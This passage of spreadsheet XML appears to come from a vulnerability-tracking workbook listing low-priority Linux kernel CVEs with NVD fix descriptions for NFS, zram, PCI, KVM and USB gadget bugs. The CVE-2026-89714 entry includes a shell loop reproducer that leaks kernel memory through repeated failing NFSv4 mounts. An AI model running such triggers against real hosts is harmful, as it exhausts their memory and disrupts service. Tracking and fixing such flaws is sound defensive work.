return in pnfs_layout_process()") switched the destination back to
free_me without restoring the drain.
Restore the pnfs_free_lseg_list() call.</t>
        </is>
      </c>
      <c r="S1053" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89710</t>
        </is>
      </c>
    </row>
    <row r="1054">
      <c r="A1054" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1054" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1054" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89714</t>
        </is>
      </c>
      <c r="D1054" s="5" t="inlineStr"/>
      <c r="E1054" s="5" t="inlineStr"/>
      <c r="F1054" s="5" t="inlineStr"/>
      <c r="G1054" s="5" t="inlineStr"/>
      <c r="H1054" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1054" s="5" t="inlineStr"/>
      <c r="J1054" s="5" t="inlineStr"/>
      <c r="K1054" s="5" t="inlineStr"/>
      <c r="L1054" s="5" t="inlineStr"/>
      <c r="M1054" s="5" t="inlineStr"/>
      <c r="N1054" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1054" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1054" s="5" t="inlineStr"/>
      <c r="Q1054" s="5" t="inlineStr"/>
      <c r="R1054" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFS: fix delegation_hash_table leak when nfs4_server_common_setup() fails
nfs4_server_common_setup() allocates server-&gt;delegation_hash_table
first, but server-&gt;destroy - the only path that frees the table via
nfs4_destroy_server() - is not assigned until the very end of the
function. If any intermediate step fails (the is_ds_only_client()
check, nfs4_init_session(), nfs4_get_rootfh(), or nfs_probe_server()),
the function returns with server-&gt;destroy still NULL, so the caller's
nfs_free_server() skips the destroy callback and the hash table is
leaked (4 KiB per attempt with the default delegation watermark).
This is trivially reachable from userspace: every failed NFSv4 mount
leaks one allocation. A client that persistently retries a mount that
cannot succeed leaks kernel memory without bound. Observed in
production where a Longhorn backup poller retried mount.nfs4 against
an NFSv3-only server roughly 10 times per second, leaking ~3.4 GiB of
unreclaimable slab (kmalloc-rnd-13-4k) per day; the node accumulated
12 GiB of leaked slab before the source was identified via the
kmem:kmalloc tracepoint (call_site=nfs4_delegation_hash_alloc).
Reproducer:
  # server exports NFSv3 only (or export path absent for v4)
  while :; do mount -t nfs4 &lt;server&gt;:/missing /mnt; done
  # watch SUnreclaim in /proc/meminfo grow 4 KiB per iteration
Free the table on the error paths between the allocation and the
assignment of server-&gt;destroy.</t>
        </is>
      </c>
      <c r="S1054" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89714</t>
        </is>
      </c>
    </row>
    <row r="1055">
      <c r="A1055" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1055" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1055" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89715</t>
        </is>
      </c>
      <c r="D1055" s="5" t="inlineStr"/>
      <c r="E1055" s="5" t="inlineStr"/>
      <c r="F1055" s="5" t="inlineStr"/>
      <c r="G1055" s="5" t="inlineStr"/>
      <c r="H1055" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1055" s="5" t="inlineStr"/>
      <c r="J1055" s="5" t="inlineStr"/>
      <c r="K1055" s="5" t="inlineStr"/>
      <c r="L1055" s="5" t="inlineStr"/>
      <c r="M1055" s="5" t="inlineStr"/>
      <c r="N1055" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1055" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1055" s="5" t="inlineStr"/>
      <c r="Q1055" s="5" t="inlineStr"/>
      <c r="R1055" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFS/localio: fix ref leak on nfs_uuid_add_file failure
When nfs_uuid_add_file() races with nfs_uuid_put() tearing down
uuid-&gt;net, it returns -ENXIO without publishing nfl-&gt;nfs_uuid via
rcu_assign_pointer().  nfs_open_local_fh() then enters its error
branch and only releases the slot's file ref and its paired net
ref plus its own entry-time net ref, while the close path is a
no-op:
    nfs_close_local_fh()
      nfs_uuid = rcu_dereference(nfl-&gt;nfs_uuid);
      if (!nfs_uuid) { rcu_read_unlock(); return; }  /* always */
nfsd_open_local_fh() returns localio holding a caller-owned +1
nfsd_file reference (from nfsd_file_get() after
nfsd_file_acquire_local()) and an entry-time nfsd_net reference
(from its first nfsd_net_try_get()) embedded as nf-&gt;nf_net.  Both
are leaked on the failure path, pinning one nfsd_file (and the
underlying struct file, dentry, inode) and one nfsd_net_ref per
occurrence, which blocks nfsd_net and netns teardown.
Fix by releasing the caller-owned file ref and its net ref through
the existing helper, using a stack-local RCU pointer so the helper
can xchg it out, then returning -ENXIO so callers do not
dereference a localio whose slot has been cleared:
    struct nfsd_file __rcu *tmp = RCU_INITIALIZER(localio);
    nfs_to_nfsd_file_put_local(pnf);
    nfs_to_nfsd_file_put_local(&amp;tmp);
    localio = ERR_PTR(-ENXIO);
The trailing nfs_to_nfsd_net_put(net) continues to release the
outer net ref, so all three nfsd_net_try_get() increments are
balanced on the error branch.</t>
        </is>
      </c>
      <c r="S1055" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89715</t>
        </is>
      </c>
    </row>
    <row r="1056">
      <c r="A1056" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1056" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1056" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89716</t>
        </is>
      </c>
      <c r="D1056" s="5" t="inlineStr"/>
      <c r="E1056" s="5" t="inlineStr"/>
      <c r="F1056" s="5" t="inlineStr"/>
      <c r="G1056" s="5" t="inlineStr"/>
      <c r="H1056" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1056" s="5" t="inlineStr"/>
      <c r="J1056" s="5" t="inlineStr"/>
      <c r="K1056" s="5" t="inlineStr"/>
      <c r="L1056" s="5" t="inlineStr"/>
      <c r="M1056" s="5" t="inlineStr"/>
      <c r="N1056" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1056" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1056" s="5" t="inlineStr"/>
      <c r="Q1056" s="5" t="inlineStr"/>
      <c r="R1056" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
zram: validate deflate params
We must validate user-supplied deflate winbits before we pass it to
zlib_deflate_workspacesize(), which triggers BUG_ON() if winbits value is
outside of valid ranges.</t>
        </is>
      </c>
      <c r="S1056" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89716</t>
        </is>
      </c>
    </row>
    <row r="1057">
      <c r="A1057" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1057" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1057" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89717</t>
        </is>
      </c>
      <c r="D1057" s="5" t="inlineStr"/>
      <c r="E1057" s="5" t="inlineStr"/>
      <c r="F1057" s="5" t="inlineStr"/>
      <c r="G1057" s="5" t="inlineStr"/>
      <c r="H1057" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1057" s="5" t="inlineStr"/>
      <c r="J1057" s="5" t="inlineStr"/>
      <c r="K1057" s="5" t="inlineStr"/>
      <c r="L1057" s="5" t="inlineStr"/>
      <c r="M1057" s="5" t="inlineStr"/>
      <c r="N1057" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1057" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1057" s="5" t="inlineStr"/>
      <c r="Q1057" s="5" t="inlineStr"/>
      <c r="R1057" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
zram: set default primary compressor in zram_destroy_comps()
Patch series "zram: fix zram issues reported by sashiko".
Sashiko drove by and reported [1] a couple of zram issues:
a possible BUG_ON() in zlib code due to missing winbits range
validation and one possible NULL-ptr dereference in zcomp.
Both are low risk yet still worth fixing.
This patch (of 2):
zram_destroy_comps() resets all compressors and leaves them set to NULL,
including the primary one, which is invalid device state, as now
comp_algorithm_show()-&gt;strcmp() can be called on a NULL compressor.  Set
default primary compressor in zram_destroy_comps().</t>
        </is>
      </c>
      <c r="S1057" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89717</t>
        </is>
      </c>
    </row>
    <row r="1058">
      <c r="A1058" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1058" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1058" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89718</t>
        </is>
      </c>
      <c r="D1058" s="5" t="inlineStr"/>
      <c r="E1058" s="5" t="inlineStr"/>
      <c r="F1058" s="5" t="inlineStr"/>
      <c r="G1058" s="5" t="inlineStr"/>
      <c r="H1058" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1058" s="5" t="inlineStr"/>
      <c r="J1058" s="5" t="inlineStr"/>
      <c r="K1058" s="5" t="inlineStr"/>
      <c r="L1058" s="5" t="inlineStr"/>
      <c r="M1058" s="5" t="inlineStr"/>
      <c r="N1058" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1058" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1058" s="5" t="inlineStr"/>
      <c r="Q1058" s="5" t="inlineStr"/>
      <c r="R1058" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
zram: fix out-of-bounds access in writeback_store()
Patch series "zram: fix stale scan bounds after reinitialization".
Both writeback_store() and read_block_state() derive their table scan
bounds from zram-&gt;disksize before acquiring dev_lock.  If the device is
reset and reinitialized with a smaller disksize between that read and lock
acquisition, the bound can describe the old table while the scan operates
on the new one.  This can lead to out-of-bounds slot accesses.
Move both bound calculations under dev_lock so each bound remains
consistent with the table throughout its scan.  Keep the fixes separate
because the affected interfaces originate from different commits and can
be backported independently.
This patch (of 2):
writeback_store() calculates the table scan bounds before taking dev_lock.
A reset followed by reconfiguration with a smaller disksize can therefore
replace zram-&gt;table while writeback_store() is waiting for the lock.  Once
it acquires the lock, it sees an initialized device but scans the new
table using the old upper bound, resulting in an out-of-bounds access.
Calculate the number of pages while holding dev_lock so the scan bound
matches the table protected by the lock.</t>
        </is>
      </c>
      <c r="S1058" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89718</t>
        </is>
      </c>
    </row>
    <row r="1059">
      <c r="A1059" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1059" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1059" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89719</t>
        </is>
      </c>
      <c r="D1059" s="5" t="inlineStr"/>
      <c r="E1059" s="5" t="inlineStr"/>
      <c r="F1059" s="5" t="inlineStr"/>
      <c r="G1059" s="5" t="inlineStr"/>
      <c r="H1059" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1059" s="5" t="inlineStr"/>
      <c r="J1059" s="5" t="inlineStr"/>
      <c r="K1059" s="5" t="inlineStr"/>
      <c r="L1059" s="5" t="inlineStr"/>
      <c r="M1059" s="5" t="inlineStr"/>
      <c r="N1059" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1059" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1059" s="5" t="inlineStr"/>
      <c r="Q1059" s="5" t="inlineStr"/>
      <c r="R1059" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
zram: fix out-of-bounds access in read_block_state()
read_block_state() calculates nr_pages before taking dev_lock.  If the
device is reset and reinitialized with a smaller disksize before lock
acquisition, nr_pages still describes the old table.  The subsequent loop
can then call slot_lock() past the end of the newly allocated table.
Read disksize after acquiring dev_lock and checking that the device is
initialized.  The read lock then keeps the table and its bound stable for
the duration of the scan.</t>
        </is>
      </c>
      <c r="S1059" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89719</t>
        </is>
      </c>
    </row>
    <row r="1060">
      <c r="A1060" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1060" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1060" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89721</t>
        </is>
      </c>
      <c r="D1060" s="5" t="inlineStr"/>
      <c r="E1060" s="5" t="inlineStr"/>
      <c r="F1060" s="5" t="inlineStr"/>
      <c r="G1060" s="5" t="inlineStr"/>
      <c r="H1060" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1060" s="5" t="inlineStr"/>
      <c r="J1060" s="5" t="inlineStr"/>
      <c r="K1060" s="5" t="inlineStr"/>
      <c r="L1060" s="5" t="inlineStr"/>
      <c r="M1060" s="5" t="inlineStr"/>
      <c r="N1060" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1060" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1060" s="5" t="inlineStr"/>
      <c r="Q1060" s="5" t="inlineStr"/>
      <c r="R1060" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
phy: rockchip-samsung-dcphy: fix out-of-range max_register
The PHY register block is 64KB, so with a register stride of 4 the
last accessible register sits at offset 0xfffc. max_register names
0x10000, one register past the end of the mapping: dumping the
registers through the regmap debugfs interface reads beyond the
ioremapped region and oopses on the unmapped page. The oops fires
with the regmap lock held, so later PHY operations deadlock.</t>
        </is>
      </c>
      <c r="S1060" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89721</t>
        </is>
      </c>
    </row>
    <row r="1061">
      <c r="A1061" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1061" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1061" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89722</t>
        </is>
      </c>
      <c r="D1061" s="5" t="inlineStr"/>
      <c r="E1061" s="5" t="inlineStr"/>
      <c r="F1061" s="5" t="inlineStr"/>
      <c r="G1061" s="5" t="inlineStr"/>
      <c r="H1061" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1061" s="5" t="inlineStr"/>
      <c r="J1061" s="5" t="inlineStr"/>
      <c r="K1061" s="5" t="inlineStr"/>
      <c r="L1061" s="5" t="inlineStr"/>
      <c r="M1061" s="5" t="inlineStr"/>
      <c r="N1061" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1061" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1061" s="5" t="inlineStr"/>
      <c r="Q1061" s="5" t="inlineStr"/>
      <c r="R1061" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
PCI/sysfs: Fix out-of-bounds read in pci_write_legacy_io()
pci_write_legacy_io() loads 4 bytes from the kernfs write buffer
regardless of how many bytes userspace wrote:
  if (count != 1 &amp;&amp; count != 2 &amp;&amp; count != 4)
          return -EINVAL;
  return pci_legacy_write(bus, off, *(u32 *)buf, count);
kernfs_fop_write_iter() allocates the buffer with kmalloc(len + 1),
so a 1-byte write to the legacy_io sysfs file allocates 2 bytes and
the unconditional u32 load reads up to 2 bytes past the end of the
allocation, which KASAN reports as a slab-out-of-bounds read.
Similarly, a 2-byte write overreads by 1 byte.
Thus, read only the number of bytes requested using get_unaligned_le16()
and get_unaligned_le32() for the 2 and 4 byte cases, interpreting the
buffer as little-endian to match the byte ordering of PCI I/O port
space.
The PowerPC implementation previously compensated for the generic
code's native-endian 32-bit load by shifting the value into place
for the 1 and 2 byte cases.  The shifts were only correct on
big-endian kernels.
On little-endian PowerPC (POWER8 and later), they extracted the wrong
bytes, so a 1-byte write wrote an out-of-bounds byte instead of the
requested value.  On big-endian, the native load also caused out_le16()
and out_le32() to reverse the user's bytes on the wire for 2 and 4 byte
writes.  The little-endian helpers resolve both issues, so the shifts
are removed.
No changes are needed for the Alpha platform.
The legacy_io file is root-only and exists only on Alpha and PowerPC,
the two architectures that define HAVE_PCI_LEGACY.</t>
        </is>
      </c>
      <c r="S1061" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89722</t>
        </is>
      </c>
    </row>
    <row r="1062">
      <c r="A1062" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1062" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1062" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89726</t>
        </is>
      </c>
      <c r="D1062" s="5" t="inlineStr"/>
      <c r="E1062" s="5" t="inlineStr"/>
      <c r="F1062" s="5" t="inlineStr"/>
      <c r="G1062" s="5" t="inlineStr"/>
      <c r="H1062" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1062" s="5" t="inlineStr"/>
      <c r="J1062" s="5" t="inlineStr"/>
      <c r="K1062" s="5" t="inlineStr"/>
      <c r="L1062" s="5" t="inlineStr"/>
      <c r="M1062" s="5" t="inlineStr"/>
      <c r="N1062" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1062" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1062" s="5" t="inlineStr"/>
      <c r="Q1062" s="5" t="inlineStr"/>
      <c r="R1062" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
lib/ucs2_string.c: fix out-of-bounds read in ucs2_strnlen()
Patch series "lib/ucs2_string.c: fix out-of-bounds read in
ucs2_strnlen()", v2.
This series fixes an off-by-one out-of-bounds read in ucs2_strnlen().
The first patch is the real fix, the second patch comes as a bonus and
fixes the code indentation.
This patch (of 2):
ucs2_strnlen() checks the current character before checking whether the
caller-provided maximum length has been reached.  If the input is not
NUL-terminated within that bound, the loop can read one ucs2_char_t past
the limit.
Test the length before dereferencing to prevent an off-by-one
out-of-bounds read.</t>
        </is>
      </c>
      <c r="S1062" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89726</t>
        </is>
      </c>
    </row>
    <row r="1063">
      <c r="A1063" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1063" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1063" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89727</t>
        </is>
      </c>
      <c r="D1063" s="5" t="inlineStr"/>
      <c r="E1063" s="5" t="inlineStr"/>
      <c r="F1063" s="5" t="inlineStr"/>
      <c r="G1063" s="5" t="inlineStr"/>
      <c r="H1063" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1063" s="5" t="inlineStr"/>
      <c r="J1063" s="5" t="inlineStr"/>
      <c r="K1063" s="5" t="inlineStr"/>
      <c r="L1063" s="5" t="inlineStr"/>
      <c r="M1063" s="5" t="inlineStr"/>
      <c r="N1063" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1063" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1063" s="5" t="inlineStr"/>
      <c r="Q1063" s="5" t="inlineStr"/>
      <c r="R1063" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: GICv2: Don't WARN on out-of-range GICV_DIR INTID
vgic_v2_deactivate() passes the INTID a guest wrote to GICV_DIR straight
to vgic_get_vcpu_irq(), and treats a failed lookup as a "can't happen"
condition with WARN_ON_ONCE().
The guest can make it happen at will, though: for any INTID outside of
the implemented SGI, PPI and SPI ranges the lookup returns NULL, since
GICv2 has no LPIs. A guest running with EOImode==1 writing such an INTID
to GICV_DIR triggers the WARN, and panics hosts running with
panic_on_warn.
Drop the WARN and ignore failed lookups.</t>
        </is>
      </c>
      <c r="S1063" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89727</t>
        </is>
      </c>
    </row>
    <row r="1064">
      <c r="A1064" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1064" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1064" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89728</t>
        </is>
      </c>
      <c r="D1064" s="5" t="inlineStr"/>
      <c r="E1064" s="5" t="inlineStr"/>
      <c r="F1064" s="5" t="inlineStr"/>
      <c r="G1064" s="5" t="inlineStr"/>
      <c r="H1064" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1064" s="5" t="inlineStr"/>
      <c r="J1064" s="5" t="inlineStr"/>
      <c r="K1064" s="5" t="inlineStr"/>
      <c r="L1064" s="5" t="inlineStr"/>
      <c r="M1064" s="5" t="inlineStr"/>
      <c r="N1064" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1064" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1064" s="5" t="inlineStr"/>
      <c r="Q1064" s="5" t="inlineStr"/>
      <c r="R1064" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i3c: renesas: Fix out-of-bounds access for newdevs mask
When software initiates DAA (Dynamic Address Assignment), the controller
reports the result via the NRSPQP (Normal Response Queue Port Register).
The data length field of the response descriptor, which is accessible
through the NRSPQP register, indicates the number of devices remaining
after DAA. Consequently, when the bus is empty, this field contains the
maximum number of devices supported by the controller (8 for the Renesas
I3C controller).
Adjust the condition that computes the newly discovered devices bitmask
to prevent an out-of-bounds when the I3C bus is empty.</t>
        </is>
      </c>
      <c r="S1064" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89728</t>
        </is>
      </c>
    </row>
    <row r="1065">
      <c r="A1065" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1065" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1065" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89730</t>
        </is>
      </c>
      <c r="D1065" s="5" t="inlineStr"/>
      <c r="E1065" s="5" t="inlineStr"/>
      <c r="F1065" s="5" t="inlineStr"/>
      <c r="G1065" s="5" t="inlineStr"/>
      <c r="H1065" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1065" s="5" t="inlineStr"/>
      <c r="J1065" s="5" t="inlineStr"/>
      <c r="K1065" s="5" t="inlineStr"/>
      <c r="L1065" s="5" t="inlineStr"/>
      <c r="M1065" s="5" t="inlineStr"/>
      <c r="N1065" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1065" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1065" s="5" t="inlineStr"/>
      <c r="Q1065" s="5" t="inlineStr"/>
      <c r="R1065" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fpga: altera-cvp: Avoid out-of-bounds read in trailing byte write
The trailing byte path in altera_cvp_send_block() dereferences a u32
pointer even when only 1-3 bytes remain in the input buffer. If the buffer
ends at a page or scatterlist boundary, this can read past the valid image
data and fault.
Copy the remaining bytes into a zero-initialized u32 before writing the
final word so only valid bytes are read from the input buffer.</t>
        </is>
      </c>
      <c r="S1065" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89730</t>
        </is>
      </c>
    </row>
    <row r="1066">
      <c r="A1066" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1066" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1066" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89732</t>
        </is>
      </c>
      <c r="D1066" s="5" t="inlineStr"/>
      <c r="E1066" s="5" t="inlineStr"/>
      <c r="F1066" s="5" t="inlineStr"/>
      <c r="G1066" s="5" t="inlineStr"/>
      <c r="H1066" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1066" s="5" t="inlineStr"/>
      <c r="J1066" s="5" t="inlineStr"/>
      <c r="K1066" s="5" t="inlineStr"/>
      <c r="L1066" s="5" t="inlineStr"/>
      <c r="M1066" s="5" t="inlineStr"/>
      <c r="N1066" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1066" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1066" s="5" t="inlineStr"/>
      <c r="Q1066" s="5" t="inlineStr"/>
      <c r="R1066" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: f_fs: Prevent deadlock during ep0 read loop
Currently, ffs_ep0_read() holds ffs-&gt;mutex when it prepares to go to
sleep waiting for an event. When no setup events are pending, it calls
wait_event_interruptible_exclusive_locked_irq() with the mutex still
held. The wait macro deliberately drops the waitqueue spinlock before
sleeping but does not drop the mutex.
If a userspace daemon is polling ep0 via read() and the gadget is
asynchronously torn down via configfs (e.g., echo "" &gt; UDC), a
deadlock can occur:
1. The configfs teardown calls functionfs_unbind(), which queues a
   FUNCTIONFS_UNBIND event.
2. The daemon wakes up, consumes the event, and drops the mutex.
3. However, if the daemon loops and immediately issues another read()
   before exiting, it reacquires ffs-&gt;mutex and again goes into an
   interruptible sleep.
4. Meanwhile, functionfs_unbind() continues execution and attempts to
   acquire ffs-&gt;mutex to tear down ep0req.
5. The kernel deadlocks because the configfs thread is stuck in an
   uninterruptible sleep waiting for the mutex, while the userspace
   daemon is in an interruptible sleep holding the mutex forever
   because no more events will arrive.
To fix this, we drop both the waitqueue spinlock and ffs-&gt;mutex before
going to sleep, and use wait_event_interruptible_exclusive() instead.
Upon waking up, we jump back to the `retry` label to safely reacquire
the mutex and re-evaluate the state machine. By not sleeping with
ffs-&gt;mutex held, we natively decouple gadget teardowns (which require
the mutex) from userspace polling.</t>
        </is>
      </c>
      <c r="S1066" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89732</t>
        </is>
      </c>
    </row>
    <row r="1067">
      <c r="A1067" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1067" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1067" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89734</t>
        </is>
      </c>
      <c r="D1067" s="5" t="inlineStr"/>
      <c r="E1067" s="5" t="inlineStr"/>
      <c r="F1067" s="5" t="inlineStr"/>
      <c r="G1067" s="5" t="inlineStr"/>
      <c r="H1067" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1067" s="5" t="inlineStr"/>
      <c r="J1067" s="5" t="inlineStr"/>
      <c r="K1067" s="5" t="inlineStr"/>
      <c r="L1067" s="5" t="inlineStr"/>
      <c r="M1067" s="5" t="inlineStr"/>
      <c r="N1067" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1067" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1067" s="5" t="inlineStr"/>
      <c r="Q1067" s="5" t="inlineStr"/>
      <c r="R1067" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: uvc: Fix null pointer dereference in uvcg_video_init()
In uvcg_video_init(), if kthread_run_worker() fails,
the error logged uses uvcg_err(), however, the pointer it uses:
video-&gt;uvc is not assigned at this point, triggering a null
pointer dereference. Fix this by directly using uvc-&gt;func which
is assigned already.</t>
        </is>
      </c>
      <c r="S1067" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89734</t>
        </is>
      </c>
    </row>
    <row r="1068">
      <c r="A1068" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1068" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1068" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89735</t>
        </is>
      </c>
      <c r="D1068" s="5" t="inlineStr"/>
      <c r="E1068" s="5" t="inlineStr"/>
      <c r="F1068" s="5" t="inlineStr"/>
      <c r="G1068" s="5" t="inlineStr"/>
